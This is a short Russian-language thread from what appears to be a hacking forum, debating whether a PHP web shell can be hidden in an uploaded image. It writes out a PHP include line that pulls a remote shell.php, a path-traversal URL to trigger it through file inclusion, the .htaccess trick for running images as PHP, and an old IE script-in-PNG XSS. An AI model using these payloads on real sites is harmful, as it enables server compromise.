Странно... В конце картинки пишешь <?php include('http://site.com/shell.php'); ?> и запускаешь картинку http://site.com/index.php?path=../../../../../image.gif всё. Откроется шелл, если конечно allow_url_include=on.

а) понял про что ты...
Не... Я имею ввиду чисто шелл через картинку залить при этом нету lfi/rfi !

Если нет лфи/рфи то как написал Пако, надо добавлять add type чтобы гифка исполнялась как пхп

.htaccess ? Если через него то у меня же нету доступа к серву

diznt
Вот это твоя аватарка?
https://forum.antichat.ru/avatars/avatar49286.gif
Ты её сам залил?

Ты как думаешь, если-бы можно было .gif файлы просто так исполнять, то долго бы этот форум прожил?

Надо иногда наверное и самому подумать, тем более:

2 diznt то, что ты видел - это возможна XSS бага старого IE
когда в конец png файла можно былобы приписать html/javascript и он выполнилсябы при просмотре данной картинке. Но этот баг вроде существовал еще во времена IE 5. если не раньше.

ну во-первых не gif, а png
Встаялешь в конец картинки <script>alert(/olololo/)</script>, заливаешь на сайт и смотришь картинку. Работает только в IE

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Ничего актуального тут нет - только при LFI или RFI возможно исполнить код, зашитый в картинку, без вариантов. Или загрузить .htaccess, в котором будет прописано, что .jpg или .gif или еще какое расширение будет выполняться как php-скрипт. Всё.

А баги, работавшие в IE5-6 уж точно неактуальны

такое редко юзают, енто раз.

Во вторых я не думаю что на античате такое бы было %)